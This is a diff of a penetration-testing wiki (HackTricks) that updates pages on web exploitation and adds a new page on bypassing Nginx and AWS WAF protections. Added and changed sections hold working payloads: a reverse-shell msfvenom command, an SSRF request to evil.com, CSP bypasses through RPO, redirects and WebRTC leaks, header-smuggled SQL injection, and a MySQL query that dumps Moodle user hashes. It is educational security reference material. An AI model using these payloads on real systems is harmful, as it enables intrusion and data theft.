 <figure><img src="../../.gitbook/assets/image (9) (1) (2).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

network-services-pentesting/pentesting-web/jboss.md

@@ -12,7 +12,7 @@
 
 </details>
 
-<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -40,7 +40,7 @@ You can expose **management servlets** via the following paths within JBoss (dep
 inurl:status EJInvokerServlet
 ```
 
-<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

network-services-pentesting/pentesting-web/moodle.md

@@ -12,7 +12,7 @@
 
 </details>
 
-<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -120,7 +120,7 @@ find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
 /usr/local/bin/mysql -u <username> --password=<password> -e "use moodle; select email,username,password from mdl_user; exit"
 ```
 
-<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

network-services-pentesting/pentesting-web/nginx.md

@@ -80,6 +80,24 @@ alias../../../../../../../../../../../ => HTTP status code 400
 alias../ => HTTP status code 403
 ```
 
+## Unsafe path restriction <a href="#unsafe-variable-use" id="unsafe-variable-use"></a>
+
+Check the following page to learn how to bypass directives like:
+
+```plaintext
+location = /admin {
+    deny all;
+}
+
+location = /admin/ {
+    deny all;
+}
+```
+
+{% content-ref url="../../pentesting-web/proxy-waf-protections-bypass.md" %}
+[proxy-waf-protections-bypass.md](../../pentesting-web/proxy-waf-protections-bypass.md)
+{% endcontent-ref %}
+
 ## Unsafe variable use <a href="#unsafe-variable-use" id="unsafe-variable-use"></a>
 
 An example of a vulnerable Nginx configuration is:

network-services-pentesting/pentesting-web/spring-actuators.md

@@ -227,6 +227,30 @@ public class AwesomeScriptEngineFactory implements ScriptEngineFactory {
 
 See this page to find how to exploit the /env + H2 combination: [https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database)
 
+## SSRF on Spring Boot Through Incorrect Pathname Interpretation <a href="#heading-ssrf-on-spring-boot-through-incorrect-pathname-interpretation" id="heading-ssrf-on-spring-boot-through-incorrect-pathname-interpretation"></a>
+
+[**From this research**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies#heading-ssrf-on-spring-boot-through-incorrect-pathname-interpretation): Spring framework accepts the matrix parameter separator character `;` before the first slash of the HTTP pathname:
+
+```http
+GET ;1337/api/v1/me HTTP/1.1
+Host: target.com
+Connection: close
+```
+
+In a scenario like the following one:
+
+<figure><img src="../../.gitbook/assets/image (717).png" alt="" width="563"><figcaption></figcaption></figure>
+
+Considering that Spring permits any character following the Matrix parameter separator, becoming possible to use the `@` character to fetch an arbitrary endpoint as well.
+
+Below is an example of the exploit request:
+
+```http
+GET ;@evil.com/url HTTP/1.1
+Host: target.com
+Connection: close
+```
+
 ## More Information
 
 * [https://tutorialboy24.blogspot.com/2022/02/introduction-to-spring-boot-related.html](https://tutorialboy24.blogspot.com/2022/02/introduction-to-spring-boot-related.html)

network-services-pentesting/pentesting-web/tomcat.md

@@ -161,7 +161,7 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit
 ### MSFVenom Reverse Shell
 
 ```bash
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war
+msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
 ```
 
 Then, **upload the `revshell.war` file and access to it (**_**/revshell/**_**)**

network-services-pentesting/pentesting-web/uncovering-cloudflare.md

@@ -71,6 +71,26 @@ cat webs.json | jq -r "select((.failed==false) and (.chain_status_codes | length
 httpx -json -no-color -list aws_webs.json -header Host: cloudflare.malwareworld.com -threads 250 -random-agent -follow-redirects -o web_checks.json
 ```
 
+## Bypassing Cloudflare through Cloudflare
+
+### Authenticated Origin Pulls
+
+This mechanism relies on **client** [**SSL certificates**](https://socradar.io/how-to-monitor-your-ssl-certificates-expiration-easily-and-why/) **to authenticate connections** between **Cloudflare’s reverse-proxy** servers and the **origin** server, which is called **mTLS**.
+
+Instead of configuring it's own certifica, Customer can simple use Cloudflare’s certificate to allow any connection from Cloudflare, **regardless of the tenant**.
+
+{% hint style="danger" %}
+Therefore, an attacker could just set a **domain in Cloudflare using CLoudflares certificate and point** it to the **victim** domain **IP** address. This way, setting his domain completely unprotected, Cloudflare won't protect the requests sent.
+{% endhint %}
+
+More info [**here**](https://socradar.io/cloudflare-protection-bypass-vulnerability-on-threat-actors-radar/).
+
+### Allowlist Cloudflare IP Addresses
+
+This will **reject connections that do not originate from Cloudflare’s** IP address ranges. This is also vulnerable to the previous setup where an attacker just **point his own domain in Cloudflare** to the **victims IP** address and attack it.
+
+More info [**here**](https://socradar.io/cloudflare-protection-bypass-vulnerability-on-threat-actors-radar/).
+
 ## Bypass Cloudflare for scraping
 
 ### Cache

network-services-pentesting/pentesting-web/wordpress.md

@@ -44,6 +44,7 @@ Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admi
 * The `wp-content` folder is the main directory where plugins and themes are stored.
 * `wp-content/uploads/` Is the directory where any files uploaded to the platform are stored.
 * `wp-includes/` This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.
+* `wp-sitemap.xml` In Wordpress versions 5.5 and greater, Worpress generates a sitemap XML file with all public posts and publicly queryable post types and taxonomies. 
 
 **Post exploitation**
 
@@ -141,7 +142,11 @@ You can also try to get information about the users by querying:
 ```
 curl http://blog.example.com/wp-json/wp/v2/users
 ```
-
+Another `/wp-json/` endpoint that can reveal some information about users is:
+```
+curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
+```
+Note that this endpoint only exposes users that have made a post. 
 **Only information about the users that has this feature enable will be provided**.
 
 Also note that **/wp-json/wp/v2/pages** could leak IP addresses.

pentesting-web/content-security-policy-csp-bypass/README.md

@@ -334,10 +334,25 @@ fbq('trackCustom', 'My-Custom-Event',{​
 
 As for the other seven third-party domains specified in the previous table, there are many other ways you can abuse them. Refer to the previously [blog post](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses) for additional explanations about other third-party abuses.
 
-### Folder path bypass
+### Bypass via RPO (Relative Path Overwrite) <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
 
-If CSP policy points to a folder and you use **%2f** to encode **"/"**, it is still considered to be inside the folder. All browsers seem to agree with that.\
-This leads to a possible bypass, by using "**%2f..%2f**" if the server decodes it. For example, if CSP allows `http://example.com/company/` you can bypass the folder restriction and execute: `http://example.com/company%2f..%2fattacker/file.js`
+In addition to the aforementioned redirection to bypass path restrictions, there is another technique called Relative Path Overwrite (RPO) that can be used on some servers.
+
+For example, if CSP allows the path `https://example.com/scripts/react/`, it can be bypassed as follows:
+
+```html
+<script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>
+```
+
+The browser will ultimately load `https://example.com/scripts/angular/angular.js`.
+
+This works because for the browser, you are loading a file named `..%2fangular%2fangular.js` located under `https://example.com/scripts/react/`, which is compliant with CSP.
+
+However, for certain servers, when receiving the request, they will decode it, effectively requesting `https://example.com/scripts/react/../angular/angular.js`, which is equivalent to `https://example.com/scripts/angular/angular.js`.
+
+By **exploiting this inconsistency in URL interpretation between the browser and the server, the path rules can be bypassed**.
+
+The solution is to not treat `%2f` as `/` on the server-side, ensuring consistent interpretation between the browser and the server to avoid this issue.
 
 Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
 
@@ -351,7 +366,7 @@ Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.
 
 If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection/).
 
-Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\
+Moreover, if the **page is loading a script using a relative path** (like  `<script src="/js/app.js">`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\
 If the vulnerable page is loaded with **httpS**, make use an httpS url in the base.
 
 ```html
@@ -389,6 +404,38 @@ ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com
 
 Other JSONP arbitrary execution endpoints can be found in [**here**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) (some of them were deleted or fixed)
 
+### Bypass via Redirection
+
+What happens when CSP encounters server-side redirection? If the redirection leads to a different origin that is not allowed, it will still fail.
+
+However, according to the description in [CSP spec 4.2.2.3. Paths and Redirects](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects), if the redirection leads to a different path, it can bypass the original restrictions.
+
+Here's an example:
+
+```html
+<!DOCTYPE html>
+<html>
+<head>
+  <meta http-equiv="Content-Security-Policy" content="script-src http://localhost:5555 https://www.google.com/a/b/c/d">
+</head>
+<body>
+  <div id=userContent>
+    <script src="https://https://www.google.com/test"></script>
+    <script src="https://https://www.google.com/a/test"></script>
+    <script src="http://localhost:5555/301"></script>
+  </div>
+</body>
+</html>
+```
+
+If CSP is set to `https://www.google.com/a/b/c/d`, since the path is considered, both `/test` and `/a/test` scripts will be blocked by CSP.
+
+However, the final `http://localhost:5555/301` will be **redirected on the server-side to `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`**. Since it is a redirection, the **path is not considered**, and the **script can be loaded**, thus bypassing the path restriction.
+
+With this redirection, even if the path is specified completely, it will still be bypassed.
+
+Therefore, the best solution is to ensure that the website does not have any open redirect vulnerabilities and that there are no domains that can be exploited in the CSP rules.
+
 ### Bypass CSP with dangling markup
 
 Read [how here](../dangling-markup-html-scriptless-injection/).
@@ -673,11 +720,26 @@ Apparently, this technique doesn't work in headless browsers (bots)
 
 On several pages you can read that **WebRTC doesn't check the `connect-src` policy** of the CSP.
 
-Actually you can *leak* informations using a *DNS request*. Check out this code:
+Actually you can _leak_ informations using a _DNS request_. Check out this code:
+
 ```javascript
 (async()=>{p=new RTCPeerConnection({iceServers:[{urls: "stun:LEAK.dnsbin"}]});p.createDataChannel('');p.setLocalDescription(await p.createOffer())})()
 ```
 
+Another option:
+
+```javascript
+var pc = new RTCPeerConnection({
+  "iceServers":[
+      {"urls":[
+        "turn:74.125.140.127:19305?transport=udp"
+       ],"username":"_all_your_data_belongs_to_us",
+      "credential":"."
+    }]
+});
+pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
+```
+
 ## Checking CSP Policies Online
 
 * [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)
@@ -694,6 +756,7 @@ Actually you can *leak* informations using a *DNS request*. Check out this code:
 * [https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d](https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d)
 * [https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme](https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme)
 * [https://www.youtube.com/watch?v=MCyPuOWs3dg](https://www.youtube.com/watch?v=MCyPuOWs3dg)
+* [https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/](https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/)
 
 ​
 

pentesting-web/crlf-0d-0a.md

@@ -12,7 +12,7 @@
 
 </details>
 
-<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -249,7 +249,7 @@ The best prevention technique is to not use users input directly inside response
 * [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)
 * [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)
 
-<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

pentesting-web/deserialization/exploiting-__viewstate-parameter.md

@@ -12,7 +12,7 @@
 
 </details>
 
-<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -237,7 +237,7 @@ out of band request with the current username
 * [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
 * [**https://blog.blacklanternsecurity.com/p/introducing-badsecrets**](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)
 
-<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

pentesting-web/file-inclusion/phar-deserialization.md

@@ -12,7 +12,7 @@
 
 </details>
 
-<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -89,7 +89,7 @@ php vuln.php
 
 {% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}
 
-<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

pentesting-web/formula-csv-doc-latex-ghostscript-injection.md

@@ -1,4 +1,4 @@
-# Formula/CSV/Doc/LaTeX Injection
+# Formula/CSV/Doc/LaTeX/GhostScript Injection
 
 <details>
 
@@ -12,7 +12,7 @@
 
 </details>
 
-<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
 
 Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
 
@@ -242,6 +242,10 @@ From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
 \href{javascript:alert(1)}{placeholder}
 ```
 
+## Ghostscript Injection
+
+TODO: Create a summary with the more relevant information and techniques from [https://blog.redteam-pentesting.de/2023/ghostscript-overview/](https://blog.redteam-pentesting.de/2023/ghostscript-overview/)
+
 ## References
 
 * [https://notsosecure.com/data-exfiltration-formula-injection-part1](https://notsosecure.com/data-exfiltration-formula-injection-part1)
@@ -249,13 +253,12 @@ From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
 * [https://salmonsec.com/cheatsheet/latex\_injection](https://salmonsec.com/cheatsheet/latex\_injection)
 * [https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
 
-<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
 
 Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
 
 {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
 
-
 <details>
 
 <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

pentesting-web/proxy-waf-protections-bypass.md

@@ -0,0 +1,130 @@
+# Proxy / WAF Protections Bypass
+
+<details>
+
+<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>
+
+## Bypassing Nginx ACL Rules <a href="#heading-bypassing-nginx-acl-rules-with-nodejs" id="heading-bypassing-nginx-acl-rules-with-nodejs"></a>
+
+Nginx restriction example:
+
+```plaintext
+location = /admin {
+    deny all;
+}
+
+location = /admin/ {
+    deny all;
+}
+```
+
+### NodeJS
+
+<figure><img src="../.gitbook/assets/image (713).png" alt=""><figcaption></figcaption></figure>
+
+* As Nginx includes the character `\xa0` as part of the pathname, the ACL rule for the `/admin` URI will not be triggered. Consequently, Nginx will forward the HTTP message to the backend;
+* When the URI `/admin\x0a` is received by the Node.js server, the character `\xa0` will be removed, allowing successful retrieval of the `/admin` endpoint.
+
+| Nginx Version | **Node.js Bypass Characters** |
+| ------------- | ----------------------------- |
+| 1.22.0        | `\xA0`                        |
+| 1.21.6        | `\xA0`                        |
+| 1.20.2        | `\xA0`, `\x09`, `\x0C`        |
+| 1.18.0        | `\xA0`, `\x09`, `\x0C`        |
+| 1.16.1        | `\xA0`, `\x09`, `\x0C`        |
+
+### Flask
+
+Flask removes the characters `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B`, and `\x09` from the URL path, but NGINX doesn't.
+
+<figure><img src="../.gitbook/assets/image (714).png" alt=""><figcaption></figcaption></figure>
+
+| Nginx Version | **Flask Bypass Characters**                                    |
+| ------------- | -------------------------------------------------------------- |
+| 1.22.0        | `\x85`, `\xA0`                                                 |
+| 1.21.6        | `\x85`, `\xA0`                                                 |
+| 1.20.2        | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
+| 1.18.0        | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
+| 1.16.1        | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
+
+### Spring Boot <a href="#heading-bypassing-nginx-acl-rules-with-spring-boot" id="heading-bypassing-nginx-acl-rules-with-spring-boot"></a>
+
+Below, you will find a demonstration of how ACL protection can be circumvented by adding the character `\x09` or  at the end of the pathname:
+
+<figure><img src="../.gitbook/assets/image (715).png" alt=""><figcaption></figcaption></figure>
+
+| Nginx Version | **Spring Boot Bypass Characters** |
+| ------------- | --------------------------------- |
+| 1.22.0        | `;`                               |
+| 1.21.6        | `;`                               |
+| 1.20.2        | `\x09`, `;`                       |
+| 1.18.0        | `\x09`, `;`                       |
+| 1.16.1        | `\x09`, `;`                       |
+
+### PHP-FPM <a href="#heading-bypassing-nginx-acl-rules-with-php-fpm-integration" id="heading-bypassing-nginx-acl-rules-with-php-fpm-integration"></a>
+
+Let's consider the following Nginx FPM configuration:
+
+```plaintext
+location = /admin.php {
+    deny all;
+}
+
+location ~ \.php$ {
+    include snippets/fastcgi-php.conf;
+    fastcgi_pass unix:/run/php/php8.1-fpm.sock;
+}
+```
+
+It's possible to bypass it accessing `/admin.php/index.php`:
+
+<figure><img src="../.gitbook/assets/image (716).png" alt=""><figcaption></figcaption></figure>
+
+### How to prevent <a href="#heading-how-to-prevent" id="heading-how-to-prevent"></a>
+
+To prevent these issues, you must use the `~` expression Instead of the `=` expression on Nginx ACL rules, for example:
+
+COPYCOPY
+
+```plaintext
+location ~* ^/admin {
+    deny all;
+}
+```
+
+## Bypassing AWS WAF ACL With Line Folding <a href="#heading-bypassing-aws-waf-acl-with-line-folding" id="heading-bypassing-aws-waf-acl-with-line-folding"></a>
+
+It's possible to bypass AWS WAF protection in a HTTP header by using the following syntax where the AWS WAF won't understand X-Query header contains a sql injection payload while the node server behind will:
+
+```http
+GET / HTTP/1.1\r\n
+Host: target.com\r\n
+X-Query: Value\r\n
+\t' or '1'='1' -- \r\n
+Connection: close\r\n
+\r\n
+```
+
+## References
+
+* [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
+
+<details>
+
+<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>

pentesting-web/race-condition.md

@@ -52,7 +52,7 @@ Note that It **doesn't work for static files** on certain servers but as static
 
 Using this technique, you can make 20-30 requests arrive at the server simultaneously - regardless of network jitter:
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Adapting to the target architecture**
 
@@ -72,7 +72,7 @@ If connection warming doesn't make any difference, there are various solutions t
 
 Using Turbo Intruder, you can introduce a short client-side delay. However, as this involves splitting your actual attack requests across multiple TCP packets, you won't be able to use the single-packet attack technique. As a result, on high-jitter targets, the attack is unlikely to work reliably regardless of what delay you set.
 
-<figure><img src="../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 Instead, you may be able to solve this problem by abusing a common security feature.
 
@@ -141,7 +141,7 @@ Content-Length: 0
   * For **delaying** the process **between** processing **one request and another** in a 2 substates steps, you could **add extra requests between** both requests.
   * For a **multi-endpoint** RC you could start sending the **request** that **goes to the hidden state** and then **50 requests** just after it that **exploits the hidden state**.
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 ### Raw BF
 
@@ -238,7 +238,7 @@ Operations that edit existing data (such as changing an account's primary email
 
 Most endpoints operate on a specific record, which is looked up using a 'key', such as a username, password reset token, or filename. For a successful attack, we need two operations that use the same key. For example, picture two plausible password reset implementations:
 
-<figure><img src="../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 2. **Probe for clues**
 

pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md

@@ -488,7 +488,7 @@ The following endpoint will allow an attacker to dump all the keys in the redis
 http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=*
 ```
 
-
+***
 
 **Possible via Gopher**
 

pentesting-web/web-vulnerabilities-methodology/README.md

@@ -27,6 +27,7 @@ Nowadays **web** **applications** usually **uses** some kind of **intermediary**
 * [ ] [**Server Side Inclusion/Edge Side Inclusion**](../server-side-inclusion-edge-side-inclusion-injection.md)
 * [ ] [**Uncovering Cloudflare**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
 * [ ] [**XSLT Server Side Injection**](../xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)
+* [ ] [**Proxy / WAF Protections Bypass**](../proxy-waf-protections-bypass.md)
 
 ## **User input**
 
@@ -119,7 +120,7 @@ Functionalities that generate files including user input might execute unexpecte
 Users that open files uploaded by users or automatically generated including user input might be compromised.
 
 * [ ] [**File Upload**](../file-upload/)
-* [ ] [**Formula Injection**](../formula-doc-latex-injection.md)
+* [ ] [**Formula Injection**](../formula-csv-doc-latex-ghostscript-injection.md)
 * [ ] [**PDF Injection**](../xss-cross-site-scripting/pdf-injection.md)
 * [ ] [**Server Side XSS**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
 

pentesting-web/xss-cross-site-scripting/README.md

@@ -184,8 +184,8 @@ Some **examples**:
